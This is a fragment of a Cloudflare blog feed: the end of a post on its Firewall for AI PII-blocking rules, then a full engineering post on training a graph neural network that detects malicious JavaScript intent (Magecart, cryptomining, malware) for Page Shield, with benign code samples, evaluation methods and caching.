    <p><a href="https://www.cloudflare.com/ai-security/">Securing AI interactions</a> shouldn't require complex integrations. Firewall for AI is seamlessly built into Cloudflare’s WAF, allowing customers to enforce security policies before prompts reach LLM endpoints. With this integration, there are <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields available</u></a> in Custom and Rate limiting rules. The rules can be used to take immediate action, such as blocking or logging risky prompts in real time.</p><p>For example, security teams can filter LLM traffic to analyze requests containing PII-related prompts. Using Cloudflare’s WAF rules engine, they can create custom security policies tailored to their AI applications.</p><p>Here’s what a rule to block detected PII prompts looks like:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cvlFU0sia6dZly2LZGG8l/670dbb1ad5068f0fd5d8f4afde9e9e02/4.png" />
          </figure><p>Alternatively, if an organization wants to allow certain PII categories, such as location data, they can create an exception rule:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wYFkoQyHFoFNwHmKtaaG3/94c7ae78dbabacf5dd8583af9e8eb071/5.png" />
          </figure><p>In addition to the rules, users can gain visibility into LLM interactions, detect potential risks, and enforce security controls using <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and <a href="https://developers.cloudflare.com/waf/analytics/security-events/"><u>Security Events</u></a>. You can find more details in our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p>
    <div>
      <h3>What's next: token counting, guardrails, and beyond</h3>
      <a href="#whats-next-token-counting-guardrails-and-beyond">
        
      </a>
    </div>
    <p>Beyond PII detection and creating security rules, we’re developing additional capabilities to strengthen AI security for our customers. The next feature we’ll release is token counting, which analyzes prompt structure and length. Customers can use the token count field in Rate Limiting and WAF Custom rules to prevent their users from sending very long prompts, which can impact third party model bills, or allow users to abuse the models. This will be followed by using AI to detect and allow content moderation, which will provide more flexibility in building guardrails in the rules.</p><p>If you're an enterprise customer, join the Firewall for AI beta today! Contact your customer team to start monitoring traffic, building protection rules, and taking control of your LLM traffic.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[Web Asset Discovery]]></category>
            <guid isPermaLink="false">5XoyHPSrtBH8pPvUJkOXMD</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we train AI to uncover malicious JavaScript intent and make web surfing safer]]></title>
            <link>https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Learn more about how Cloudflare developed an AI model to uncover malicious JavaScript intent using a Graph Neural Network, from pre-processing data to inferencing at scale.  ]]></description>
            <content:encoded><![CDATA[ <p>Modern websites <a href="https://blog.cloudflare.com/application-security-report-2024-update/#enterprise-applications-use-47-third-party-scripts-on-average"><u>rely heavily</u></a> on JavaScript. Leveraging third-party scripts accelerates web app development, enabling organizations to deploy new features faster without building everything from scratch. However, supply chain attacks targeting third-party JavaScript are no longer just a theoretical concern — they have become a reality, as <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk/"><u>recent incidents</u></a> have shown. Given the vast number of scripts and the rapid pace of updates, manually reviewing each one is not a scalable security strategy.</p><p>Cloudflare provides automated client-side protection through <a href="https://developers.cloudflare.com/page-shield/"><u>Page Shield</u></a>. Until now, Page Shield could scan JavaScript dependencies on a web page, flagging obfuscated script content which also exfiltrates data. However, these are only indirect indicators of compromise or malicious intent. Our original approach didn’t provide clear insights into a script’s specific malicious objectives or the type of attack it was designed to execute.</p><p>Taking things a step further, we have developed a new AI model that allows us to detect the exact malicious intent behind each script. This intelligence is now integrated into Page Shield, available to all Page Shield <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a> customers. We are starting with three key threat categories: <a href="https://en.wikipedia.org/wiki/Web_skimming"><u>Magecart</u></a>, crypto mining, and malware.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EefJpCcho3DIjbVbQIjuz/68852b905955065e48ec2aa4648621cd/1.png" />
          </figure><p><sup><i>Screenshot of Page Shield dashboard showing results of three types of analysis.</i></sup></p><p>With these improvements, Page Shield provides deeper visibility into client-side threats, empowering organizations to better protect their users from evolving security risks. This new capability is available to all Page Shield customers with the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a>. Head over <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>to the dashboard</u></a>, and you can find the new malicious code analysis for each of the scripts monitored.</p><p>In the following sections, we take a deep dive into how we developed this model.</p>
    <div>
      <h3>Training the model to detect hidden malicious intent</h3>
      <a href="#training-the-model-to-detect-hidden-malicious-intent">
        
      </a>
    </div>
    <p>We built this new Page Shield AI model to detect the intent of JavaScript threats at scale. Training such a model for JavaScript comes with unique challenges, including dealing with web code written in many different styles, often obfuscated yet benign. For instance, the following three snippets serve the same function.</p>
            <pre><code>//Readable, plain code
function sayHi(name) {
  console.log(
    `Hello ${
      name ?? 
      "World" //default
    }!`
  );
}
sayHi("Internet");

//Minified
function sayHi(l){console.log(`Hello ${l??"World"}!`)}sayHi("Internet");

//Obfuscated
var h=Q;(function(V,A){var J=Q,p=V();while(!![]){try{var b=-parseInt(J('0x79'))/0x1*(-parseInt(J('0x6e'))/0x2)+-parseInt(J('0x80'))/0x3+parseInt(J('0x76'))/0x4*(-parseInt(J('0x72'))/0x5)+parseInt(J('0x6a'))/0x6+parseInt(J('0x84'))/0x7+-parseInt(J('0x6d'))/0x8*(-parseInt(J('0x7d'))/0x9)+parseInt(J('0x73'))/0xa*(-parseInt(J('0x7c'))/0xb);if(b===A)break;else p['push'](p['shift']());}catch(U){p['push'](p['shift']());}}}(S,0x22097));function sayHi(p){var Y=Q,b=(function(){var W=!![];return function(e,x){var B=W?function(){var m=Q;if(x){var G=x[m('0x71')](e,arguments);return x=null,G;}}:function(){};return W=![],B;};}()),U=b(this,function(){var s=Q,W=typeof window!==s('0x6b')?window:typeof process===s('0x6c')&amp;&amp;typeof require===s('0x7b')&amp;&amp;typeof global==='object'?global:this,e=W['console']=W['console']||{},x=[s('0x78'),s('0x70'),'info',s('0x69'),s('0x77'),'table',s('0x7f')];for(var B=0x0;B&lt;x[s('0x83')];B++){var G=b[s('0x75')][s('0x6f')][s('0x74')](b),t=x[B],X=e[t]||G;G['__proto__']=b[s('0x74')](b),G['toString']=X[s('0x7e')]['bind'](X),e[t]=G;}});U(),console['log'](Y('0x81')+(p??Y('0x7a'))+'!');}sayHi(h('0x82'));function Q(V,A){var p=S();return Q=function(b,U){b=b-0x69;var W=p[b];return W;},Q(V,A);}function S(){var v=['Internet','length','77966Hcxgji','error','1078032RtaGFM','undefined','object','8zrzBEk','244xEPFaR','prototype','warn','apply','10LQgYRU','400TNVOzq','bind','constructor','146612cfnkCX','exception','log','1513TBJIGL','World','function','57541MkoqrR','2362383dtBFrf','toString','trace','647766YvOJOm','Hello\x20'];S=function(){return v;};return S();}</code></pre>
            <p>With such a variety of styles (and many more), our machine learning solution needs to balance precision (low false positive rate), recall (don’t miss an attack vector), and speed. Here’s how we do it:</p>
    <div>
      <h4>Using syntax trees to classify malicious code</h4>
      <a href="#using-syntax-trees-to-classify-malicious-code">
        
      </a>
    </div>
    <p>JavaScript files are parsed into <a href="https://en.wikipedia.org/wiki/Tree_(graph_theory)"><u>syntax trees (connected acyclic graphs)</u></a>. These serve as the input to a <a href="https://en.wikipedia.org/wiki/Graph_neural_network"><u>Graph Neural Network (GNN)</u></a>. GNNs are used because they effectively capture the interdependencies (relationships between nodes) in executing code, such as a function calling another function. This contrasts with treating the code as merely a sequence of words, which, incidentally, is not how a compiler treats code either. Another motivation to use GNNs is the <a href="https://dl.acm.org/doi/10.1007/978-3-030-92270-2_57"><u>insight</u></a> that the syntax trees of malicious versus benign JavaScript tend to be different. For example, it’s not rare to find attacks that consist of malicious snippets inserted into, but otherwise isolated from, the rest of an otherwise benign codebase.</p><p>To parse the files, we chose the <a href="https://tree-sitter.github.io/"><u>tree-sitter library</u></a> for its speed. One peculiarity of this parser, specialized for text editors, is that it produces <a href="https://en.wikipedia.org/wiki/Parse_tree"><u>concrete syntax trees (CST)</u></a>. CSTs retain everything from the original text input, including spacing information, comments, and even nodes attempting to repair syntax errors. This differs from <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>abstract syntax trees (AST)</u></a>, the data structures used in compilers, which have just the essential information to execute the underlying code while ignoring the rest. One key reason for wanting to convert the CST to an AST-like structure is that it reduces the tree size, which in turn reduces computation and memory usage. To do that, we abstract and filter out unnecessary nodes such as code comments. Consider, for instance, how the following snippet</p>
            <pre><code>x = `result: ${(10+5) *   3}`;;; //this is a comment</code></pre>
            <p>… gets converted to an AST-like representation:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4KweWZ4yIzOTiIcYqHC682/56c059b38ad46949e7285d84438be4c9/2.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. Unnecessary elements get removed (e.g. comments, spacing) whereas others get encoded in the tree structure (order of operations due to parentheses).</i></sup></p><p>One benefit of working with parsed syntax trees is that <a href="https://huggingface.co/learn/nlp-course/en/chapter2/4"><u>tokenization</u></a> comes for free! We collect the text of the leaf nodes and treat it as our tokens, which will be used as features (inputs) for the machine learning model. Note that some characters in the original input, for instance the backticks that form a template string, are not treated as tokens per se, but remain encoded in the graph structure given to the GNN. (Notice in the sample tree representations the different node types, such as “assignment_expression”.) Moreover, some details in the exact text input become irrelevant in the executing AST, such as whether a string was originally written using double quotes vs. single quotes.</p><p>We encode the node tokens and node types into a matrix of counts. Currently, we lowercase the nodes' text to reduce vocabulary size, improving efficiency and reducing sparsity. Note that JavaScript is a case-sensitive language, so this is a trade-off we continue to explore. This matrix and, importantly, the information about the edges between nodes in the tree form the input to the GNN.</p><p>How do we deal with obfuscated code? We don’t treat it specially. Rather, we always parse the JavaScript text as is, which incidentally unescapes <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Character_escape"><u>escape characters</u></a> too. The AST shown below, produced from the following input, illustrates this:</p>
            <pre><code>atob('\x55\x32\x56\x75\x5a\x45\x52\x68\x64\x47\x45\x3d') == "SendData"</code></pre>
            
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/sV2qPtj8G30EFnW6rwCav/ef0a970e338e5610da08fa3ccbdeafcc/3.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. JavaScript escape characters are unescaped.</i></sup></p><p>Moreover, our vocabulary contains several tokens that are commonly used in obfuscated code, such as double escaped hexadecimal-encoded characters. That, together with the graph structure information, is giving us satisfying results — the model successfully classifies malicious code whether it's obfuscated or not. Analogously, our model’s scores remain stable when applied to plain benign scripts compared to obfuscating them in different ways. In other words, the model’s score on a script is similar to the score on an obfuscated version of the same script. Having said that, some of our model's false positives (FPs) originate from benign but obfuscated code, so we continue to investigate how we can improve our model's intelligence.</p>
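    <p>As a rough illustration of the feature extraction described in this section, the following sketch walks a small hand-written tree and collects lowercased leaf tokens, node-type counts, and parent-child edges. The tree shape, the <code>extractFeatures</code> helper, and the choice to keep one set of counts per tree are assumptions made for this example; the exact layout of the count matrix is not described here, and a real pipeline would start from a parser's output.</p>

```javascript
// Hypothetical AST-like tree: every node has a type; leaf nodes also carry text.
const sampleTree = {
  type: "assignment_expression",
  children: [
    { type: "identifier", text: "X" },
    {
      type: "template_string",
      children: [
        { type: "identifier", text: "x" },
        { type: "number", text: "10" },
      ],
    },
  ],
};

// Walk the tree once, collecting count features and parent-child edges.
function extractFeatures(root) {
  const tokenCounts = new Map(); // lowercased leaf text -> count
  const typeCounts = new Map(); // node type -> count
  const edges = []; // [parentId, childId] pairs, ids assigned in visit order
  let nextId = 0;

  const bump = (map, key) => map.set(key, (map.get(key) ?? 0) + 1);

  function visit(node, parentId) {
    const id = nextId++;
    if (parentId !== null) edges.push([parentId, id]);
    bump(typeCounts, node.type);

    const children = node.children ?? [];
    if (children.length === 0) {
      // Leaf node: its text becomes a token (lowercased to shrink the vocabulary).
      if (typeof node.text === "string") bump(tokenCounts, node.text.toLowerCase());
    }
    children.forEach((child) => visit(child, id));
  }

  visit(root, null);
  return { tokenCounts, typeCounts, edges };
}

const features = extractFeatures(sampleTree);
console.log(features.tokenCounts, features.typeCounts, features.edges);
```

    <p>Because of the lowercasing step, the identifiers <code>X</code> and <code>x</code> collapse into a single token here, which is the case-sensitivity trade-off mentioned above.</p>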
    <div>
      <h4>Architecting the Graph Neural Network</h4>
      <a href="#architecting-the-graph-neural-network">
        
      </a>
    </div>
    <p>We train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that processes the input trees. The message-passing layers iteratively update each node’s internal representation, encoded in a matrix, by aggregating information from its neighbors (parent and child nodes in the tree). A pooling layer then condenses this matrix into a feature vector, discarding the explicit graph structure (edge connections between nodes). At this point, standard neural network layers, such as fully connected layers, can be applied to progressively refine the representation. Finally, a <a href="https://en.wikipedia.org/wiki/Softmax_function"><u>softmax activation</u></a> layer produces a probability distribution over the four possible classes: benign, magecart, cryptomining, and malware.</p><p>We use the <a href="https://github.com/tensorflow/gnn"><u>TF-GNN library</u></a> to implement graph neural networks, with <a href="https://keras.io/"><u>Keras</u></a> serving as the high-level frontend for model building and training. This works well for us with one exception: <a href="https://github.com/tensorflow/gnn/issues/803#issue-2279602052"><u>TF-GNN does not support sparse matrices / tensors</u></a>. (That lack of support increases memory consumption, which also adds some latency.) Because of this, we are considering switching to <a href="https://pytorch-geometric.readthedocs.io/"><u>PyTorch Geometric</u></a> instead.</p>
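    <p>To make the message-passing and pooling steps more concrete, here is a deliberately tiny sketch without any learned weights. Each node averages its own features with those of its tree neighbors, the node matrix is mean-pooled into one vector, and a softmax turns that vector into probabilities. The helper names, the two-dimensional features, and the use of plain averaging are assumptions for illustration; a trained network applies learned transformations at every step and adds fully connected layers before the softmax.</p>

```javascript
// Toy tree with 3 nodes: node 0 is the parent of nodes 1 and 2.
const treeEdges = [[0, 1], [0, 2]];
// One feature row per node (values chosen arbitrarily for the example).
const nodeFeatures = [[1, 0], [0, 1], [0, 1]];

// Build an adjacency list linking each node to its parent and children.
function neighborsOf(edgeList, nodeCount) {
  const adjacency = Array.from({ length: nodeCount }, () => []);
  for (const [parent, child] of edgeList) {
    adjacency[parent].push(child);
    adjacency[child].push(parent);
  }
  return adjacency;
}

// Element-wise mean of a non-empty list of equally sized vectors.
function meanOf(vectors) {
  return vectors[0].map(
    (_, d) => vectors.reduce((sum, v) => sum + v[d], 0) / vectors.length
  );
}

// One message-passing round: each node averages itself with its neighbors.
function messagePass(features, edgeList) {
  const adjacency = neighborsOf(edgeList, features.length);
  return features.map((own, i) =>
    meanOf([own, ...adjacency[i].map((j) => features[j])])
  );
}

// Numerically stable softmax over a vector of logits.
function softmax(logits) {
  const max = Math.max(...logits);
  const exps = logits.map((z) => Math.exp(z - max));
  const total = exps.reduce((a, b) => a + b, 0);
  return exps.map((e) => e / total);
}

const updated = messagePass(nodeFeatures, treeEdges); // still one row per node
const pooled = meanOf(updated); // graph structure is discarded here
const probabilities = softmax(pooled);
console.log(updated, pooled, probabilities);
```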
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79SbvJgWq3mwMks6Vtxpgs/5ab55f19b6cf90dc070b5f0d70abdde9/4.png" />
          </figure><p><sup><i>Graph neural network architecture, transforming the input tree with features down to the 4 classification probabilities.</i></sup></p><p>The model’s output probabilities are finally inverted and scaled into <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>scores</u></a> (ranging from 1 to 99). The “js_integrity” score aggregates the malicious classes (magecart, malware, cryptomining). A low score means likely malicious, and a high score means likely benign. We use this output format for consistency with other Cloudflare detection systems, such as <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Bot Management</u></a> and the <a href="https://developers.cloudflare.com/waf/detections/attack-score/"><u>WAF Attack Score</u></a>. The following diagram illustrates the preprocessing and feature analysis pipeline of the model down to the inference results.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/zLPW9kydBIJySfjaN2TTI/d7b9a7f51c1bb501aac2b7a724d62a1d/5.png" />
          </figure><p><sup><i>Model inference pipeline to sniff out and alert on malicious JavaScript.</i></sup></p>
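    <p>The inversion and scaling step can be sketched as follows. The exact formula is not given here, so this example assumes a linear mapping, sums the three malicious probabilities for the aggregate score, and clamps to the 1 to 99 range; the class order and the <code>toScore</code> and <code>scoreScript</code> helpers are likewise hypothetical.</p>

```javascript
// Assumed class order, for illustration only.
const CLASSES = ["benign", "magecart", "cryptomining", "malware"];

// Invert a malicious probability (high = bad) into a score (low = bad),
// then scale and clamp it to the 1..99 range.
function toScore(maliciousProbability) {
  const inverted = 1 - maliciousProbability;
  const scaled = Math.round(inverted * 100);
  return Math.min(99, Math.max(1, scaled));
}

// Turn the softmax output into an aggregate score plus per-class scores.
function scoreScript(probabilities) {
  const [, magecart, cryptomining, malware] = probabilities;
  return {
    // Assumption: the aggregate treats the script as malicious if any class fires.
    js_integrity: toScore(magecart + cryptomining + malware),
    perClass: {
      magecart: toScore(magecart),
      cryptomining: toScore(cryptomining),
      malware: toScore(malware),
    },
  };
}

const likelyBenign = scoreScript([0.97, 0.01, 0.01, 0.01]);
const likelyMagecart = scoreScript([0, 1, 0, 0]);
console.log(CLASSES, likelyBenign, likelyMagecart);
```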
    <div>
      <h4>Tackling unbalanced data: malicious scripts are the minority</h4>
      <a href="#tackling-unbalanced-data-malicious-scripts-are-the-minority">
        
      </a>
    </div>
    <p>Finding malicious scripts is like finding a needle in a haystack; they are anomalies among plenty of otherwise benign JavaScript. This naturally results in a highly imbalanced dataset. For example, our Magecart-labeled scripts account for only ~6% of the total dataset.</p><p>Not only that, but the “benign” category contains an immense variety (and volume) of JavaScript to classify. The lengths of the scripts are highly diverse (ranging from just a few bytes to several megabytes), their coding styles vary widely, some are obfuscated whereas others are not, etc. To make matters worse, malicious payloads are often just small, carefully inserted fragments within an otherwise perfectly valid and functional benign script. This all creates a cacophony of token distributions for an ML model to make sense of.</p><p>Still, our biggest problem remains finding enough malevolent JavaScript to add to our training dataset. Put simply, our strategy for data collection and annotation is therefore two-fold:</p><ol><li><p>Malicious scripts are about quantity → the more, the merrier (for our model, that is 😉). Of course, we still care about quality and diversity. But because we have so few of them (in comparison to the number of benign scripts), we take what we can.</p></li><li><p>Benign scripts are about quality → the more <i>variance</i>, the merrier. Here we have the opposite situation. Because we can collect so many of them easily, the value is in adding differentiated scripts.</p></li></ol>
    <div>
      <h5>Learning key scripts only: reduce false positives with minimal annotation time</h5>
      <a href="#learning-key-scripts-only-reduce-false-positives-with-minimal-annotation-time">
        
      </a>
    </div>
    <p>To filter out semantically similar scripts (mostly benign), we employed the latest advancements in LLMs for generating code <a href="https://www.cloudflare.com/learning/ai/what-are-embeddings/"><u>embeddings</u></a>. We add to our dataset only those scripts that are distant enough from each other, as measured by <a href="https://developers.cloudflare.com/vectorize/best-practices/create-indexes/#distance-metrics"><u>vector cosine similarity</u></a>. Our methodology is simple. For a batch of potentially new scripts:</p><ul><li><p>Initialize an empty <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/"><u>vector database</u></a>. For local experimentation, we are fans of <a href="https://docs.trychroma.com/docs/overview/introduction"><u>Chroma DB</u></a>.</p></li><li><p>For each script:</p><ul><li><p>Call an LLM to generate its embedding. We’ve had good results with <a href="https://github.com/bigcode-project/starcoder2"><u>starcoder2</u></a>, and most recently <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-32B"><u>qwen2.5-coder</u></a>.</p></li><li><p>Search the database for the single closest vector among the scripts already stored.</p></li><li><p>If the distance to that vector exceeds the threshold (0.10), select the script and add it to the database.</p></li><li><p>Else, discard the script (though we consider it for further validations and tests).</p></li></ul></li></ul><p>Although this methodology is inherently biased toward the scripts seen first, in practice we’ve used it for batches of newly and randomly sampled JavaScript only. 
To review the whole existing dataset, we could employ other but similar strategies, like applying <a href="https://scikit-learn.org/stable/modules/generated/sklearn.cluster.HDBSCAN.html"><u>HDBSCAN</u></a> to identify an unknown number of clusters and then selecting the medoids, boundary, and anomaly data points.</p><p>We’ve successfully employed this strategy for pinpointing a few highly varied scripts that were relevant for the model to learn from. Our security researchers save a tremendous amount of time on manual annotation, while false positives are drastically reduced. For instance, in a large and unlabeled bucket of scripts, one of our early evaluation models identified ~3,000 of them as malicious. That’s too many to manually review! By removing near duplicates, we narrowed the need for annotation down to only 196 samples, less than 7% of the original amount (see the <a href="https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding"><u>t-SNE</u></a> visualization below of selected points and clusters). Three of those scripts were actually malicious, one we could not fully determine, and the rest were benign. By just re-training with these new labeled scripts, a tiny fraction of our whole dataset, we reduced false positives by 50% (as gauged in the same bucket and in a controlled test set). We have consistently repeated this procedure to iteratively enhance successive model versions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hHw00ojXE4CdorMQI5b56/897e0e045230522478e0735c3e28ff12/6.png" />
          </figure><p><sup><i>2D visualization of scripts projected onto an embedding space, highlighting those sufficiently dissimilar from one another.</i></sup></p>
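    <p>The greedy selection procedure described above can be sketched in a few lines. This is a minimal in-memory version under stated assumptions: the embeddings are hard-coded two-dimensional vectors rather than LLM outputs, a plain array stands in for the vector database, and <code>selectDiverse</code> is a hypothetical helper name. Only the 0.10 cosine distance threshold comes from the text.</p>

```javascript
// Cosine distance = 1 - cosine similarity (0 means same direction).
function cosineDistance(a, b) {
  let dot = 0;
  let normA = 0;
  let normB = 0;
  a.forEach((x, i) => {
    dot += x * b[i];
    normA += x * x;
    normB += b[i] * b[i];
  });
  return 1 - dot / (Math.sqrt(normA) * Math.sqrt(normB));
}

// Keep a script only if its nearest already-selected neighbor is far enough away.
function selectDiverse(embeddings, threshold = 0.10) {
  const selected = []; // stands in for the vector database
  const discarded = []; // kept aside for further validations and tests
  embeddings.forEach((vector, index) => {
    // Math.min() of an empty list is Infinity, so the first script is always kept.
    const nearest = Math.min(
      ...selected.map((entry) => cosineDistance(vector, entry.vector))
    );
    if (nearest > threshold) selected.push({ index, vector });
    else discarded.push(index);
  });
  return { selected: selected.map((entry) => entry.index), discarded };
}

// Toy embeddings: the second vector is a near duplicate of the first.
const toyEmbeddings = [[1, 0], [0.99, 0.05], [0, 1], [0.7, 0.7]];
const selection = selectDiverse(toyEmbeddings);
console.log(selection);
```

    <p>The result depends on the order in which scripts arrive, which is the first-seen bias noted above.</p>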
    <div>
      <h4>From the lab, to the real world</h4>
      <a href="#from-the-lab-to-the-real-world">
        
      </a>
    </div>
    <p>Our latest model in evaluation has both a macro accuracy and an overall malicious precision nearing 99%(!) on our test dataset. So we are done, right? Wrong! The real world, where many more variations of benign JavaScript can be seen, is not the same as the lab. To keep prediction changes between model releases to a minimum, we follow these three foolproofing measures:</p>
    <div>
      <h5>Evaluate metrics uncertainty</h5>
      <a href="#evaluate-metrics-uncertainty">
        
      </a>
    </div>
    <p>First, we thoroughly estimate the <i>uncertainty</i> of our offline evaluation metrics. How accurate are our accuracy metrics themselves? To gauge that, we calculate the <a href="https://en.wikipedia.org/wiki/Standard_error"><u>standard error</u></a> and confidence intervals for our offline metrics (precision, recall, <a href="https://en.wikipedia.org/wiki/F-score"><u>F1 measure</u></a>). To do that, we calculate the model’s predicted scores on the test set once (the original sample), and then generate bootstrapped resamples from it. We use simple random (re-)sampling as it offers us a more conservative estimate of error than stratified or balanced sampling.</p><p>We generate 1,000 resamples, each drawn from the original test sample at 15% of its size, then calculate the metrics for each individual resample. This results in a distribution of sampled data points. We measure its mean, the standard deviation (with <a href="https://en.wikipedia.org/wiki/Standard_deviation#Corrected_sample_standard_deviation"><u>Bessel’s correction</u></a>), and finally the standard error and a <a href="https://en.wikipedia.org/wiki/Confidence_interval"><u>confidence interval</u></a> (CI) (using the percentile method, such as the 2.5 and 97.5 percentiles for a 95% CI). See below for an example of a bootstrapped distribution for precision (P), illustrating that a model’s performance is a continuum rather than a fixed value, and that the distribution might exhibit subtly (left-)skewed tails. For some of our internally evaluated models, it can easily happen that some of the sub-sampled metrics decrease by up to 20 percentage points within a 95% confidence range. High standard errors and/or wide confidence ranges signal that the model needs improvement and that our test set needs to be improved and enlarged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2x3X2oVv2EfIkLYFrcjLWK/985a685e565f759b7781821595ac4ff7/7.png" />
          </figure><p><sup><i>An evaluation metric, here precision (P), might change significantly depending on what’s exactly tested. We thoroughly estimate the metric’s standard error and confidence intervals.</i></sup></p>
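    <p>The bootstrap procedure above can be sketched as follows for precision. The 1,000 resamples, the 15% resample size, Bessel’s correction, and the percentile method come from the text; the synthetic labels, the seeded <code>mulberry32</code> random generator (used only to make the example repeatable), and the <code>bootstrapPrecision</code> helper are assumptions. The standard deviation of the bootstrapped values is reported as is, since it is commonly read as the bootstrap estimate of the metric’s standard error.</p>

```javascript
// Small seeded pseudo-random generator so that the example is repeatable.
function mulberry32(seed) {
  let a = seed;
  return function () {
    a = (a + 0x6d2b79f5) | 0;
    let t = Math.imul(a ^ (a >>> 15), 1 | a);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Precision over [actual, predicted] pairs, where 1 means malicious.
function precision(pairs) {
  let truePositives = 0;
  let falsePositives = 0;
  for (const [actual, predicted] of pairs) {
    if (predicted === 1) {
      if (actual === 1) truePositives++;
      else falsePositives++;
    }
  }
  const flagged = truePositives + falsePositives;
  return flagged === 0 ? NaN : truePositives / flagged;
}

function bootstrapPrecision(pairs, { resamples = 1000, fraction = 0.15, seed = 42 } = {}) {
  const random = mulberry32(seed);
  const size = Math.max(1, Math.round(pairs.length * fraction));
  const values = [];
  Array.from({ length: resamples }).forEach(() => {
    // Simple random resampling with replacement from the original test sample.
    const sample = Array.from(
      { length: size },
      () => pairs[Math.floor(random() * pairs.length)]
    );
    const p = precision(sample);
    if (!Number.isNaN(p)) values.push(p); // skip resamples with nothing flagged
  });
  values.sort((x, y) => x - y);
  const mean = values.reduce((s, v) => s + v, 0) / values.length;
  // Sample standard deviation with Bessel's correction (divide by n - 1).
  const stdDev = Math.sqrt(
    values.reduce((s, v) => s + (v - mean) ** 2, 0) / (values.length - 1)
  );
  // Percentile method for the 95% confidence interval.
  const percentile = (q) =>
    values[Math.min(values.length - 1, Math.floor(q * values.length))];
  return { mean, stdDev, ci95: [percentile(0.025), percentile(0.975)] };
}

// Synthetic test set: 40 true positives, 10 false positives, 150 true negatives.
const labeled = [
  ...Array.from({ length: 40 }, () => [1, 1]),
  ...Array.from({ length: 10 }, () => [0, 1]),
  ...Array.from({ length: 150 }, () => [0, 0]),
];
const estimate = bootstrapPrecision(labeled);
console.log(estimate);
```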
    <div>
      <h5>Benchmark against massive offline unlabeled dataset</h5>
      <a href="#benchmark-against-massive-offline-unlabeled-dataset">
        
      </a>
    </div>
    <p>We run our model on the entire corpus of scripts seen by Cloudflare's network and temporarily cached in the last 90 days. By the way, that’s nearly 1 TiB and 26 million different JavaScript files! With that, we can observe the model’s behavior against real traffic, yet completely offline (to ensure no impact to production). We check the malicious prediction rate, latency, throughput, etc. and sample some of the predictions for verification and annotation.</p>
    <div>
      <h5>Review in staging and shadow mode</h5>
      <a href="#review-in-staging-and-shadow-mode">
        
      </a>
    </div>
    <p>Only after all the previous checks have cleared do we run this new tentative version in our staging environment. For major model upgrades, we also deploy them in <a href="https://cloud.google.com/architecture/guidelines-for-developing-high-quality-ml-solutions"><u>shadow mode</u></a> (log-only mode), running in production alongside our existing model. We study the model’s behavior for a while before finally marking it as production ready; otherwise, we go back to the drawing board.</p>
    <div>
      <h3>AI inference at scale</h3>
      <a href="#ai-inference-at-scale">
        
      </a>
    </div>
    <p>At the time of writing, Page Shield sees an average of <i>40,000 scripts per second</i>. Many of those scripts are repeated, though. Traffic on the Internet tends to follow a <a href="https://blog.cloudflare.com/making-waf-ai-models-go-brr/#caching-inference-result"><u>Zipf's law distribution</u></a>, and JavaScript seen on the Cloudflare network is no exception. For instance, it is estimated that different versions of the <a href="https://blog.cloudflare.com/page-shield-positive-blocking-policies/#client-side-libraries"><u>Bootstrap library run on more than 20% of websites</u></a>. It would be a waste of computing resources if we repeatedly re-ran the AI model for the very same inputs, so inference result caching is needed. Not to mention, GPU utilization is expensive!</p><p>The question is, what is the best way to cache the scripts? We could take an <a href="https://csrc.nist.gov/glossary/term/sha_256"><u>SHA-256</u></a> hash of the plain content as is. However, any single change in the transmitted content (comments, spacing, or a different character set) changes the SHA-256 output hash.</p><p>A better caching approach? Since we need to parse the code into syntax trees for our GNN model anyway, this tree structure and content is what we use to hash the JavaScript. As described above, we filter out nodes in the syntax tree like comments or empty statements. In addition, some irrelevant details get abstracted out in the AST (escape sequences are unescaped, the way of writing strings is normalized, unnecessary parentheses are removed because the order of operations is encoded in the tree, etc.).</p><p>Using such a tree-based approach to caching, we find that at any moment over 99.9% of reported scripts have already been seen in our network! Unless we deploy a new model with significant improvements, we don’t re-score previously seen JavaScript but just return the cached score. 
As a result, the model only needs to be called <i>fewer than 10 times per minute</i>, even during peak times!</p>
